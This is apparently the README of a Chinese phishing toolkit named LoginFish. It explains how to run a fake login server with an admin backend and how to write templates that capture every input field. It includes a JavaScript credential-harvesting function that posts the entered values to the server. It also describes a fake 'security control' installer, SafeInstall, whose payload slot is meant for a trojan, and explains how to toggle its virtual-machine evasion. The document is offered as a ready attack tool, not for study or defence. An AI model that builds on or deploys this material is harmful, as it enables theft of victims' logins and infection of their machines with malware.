LoginFish 通用钓鱼工具
使用方法
# 后台登录密码,请修改 password.txt
# 第一次运行会自动生成密码 写到 password.txt
# 后台地址 http://host:5522/admin/login
# 默认端口5522
./LoginFish port
./LoginFish 80
密码记录
可以参考/static/template/front_login_keylogger.html文件
所有input标签的内容都会被提交到后端,引用<script src="/static/dist/login.js"></script>并把登录按钮绑定到login_submit()函数即可
你也可以自定义login.js,并控制登录之后的返回信息
比如说点击登录之后执行alert('帐号/密码校验不通过')
function login_submit() {
var input = document.getElementsByTagName('input')
var data = ''
for (var i = 0; i < input.length; i++) {
const put = input[i]
var name = ''
if (put.className) name = '_' + put.className
if (put.name) name = '_' + put.name
var key = `input[${i}${name}]=${put.value}`;
data = data + key + '&'
}
if (data != '') post(data)
console.log(data)
}模板修改
打开static/template/目录,默认有俩个模板,分别是front_login_1.html和front_login.html
如果需要css和js文件则把其放在static/dist中
模板中使用<script src="/static/dist/login.js"></script> 这样的路径进行引用
如果需要自定义模板,则在static/template/中创建以front_开头的html文件即可.
然后需要引用<script src="/static/dist/login.js"></script> 文件,再把某个下载按钮绑定到onclick_input事件即可
<div onclick="onclick_input()">
<label for="password">密码</label>
<input name="password" class="password" type="password" disabled placeholder="下载安全控件" id="password">
</div>或者你也可以直接使用<a href='/down'>下载</a> 这样的方式去绑定下载地址.
SafeInstall 模拟安全控件
使用Visual Studio 2015与.NET 4.0开发,替换木马需要修改资源文件中的load
如果需要关闭屏蔽虚拟机,则编辑SafeInstall/SafeInstall/Form1.cs文件
public Form1()
{
checkVM(); //注释该行即可
writeFile();
InitializeComponent();
progressBar1.Value = 0;
timer1.Interval = 50;
timer1.Start();
}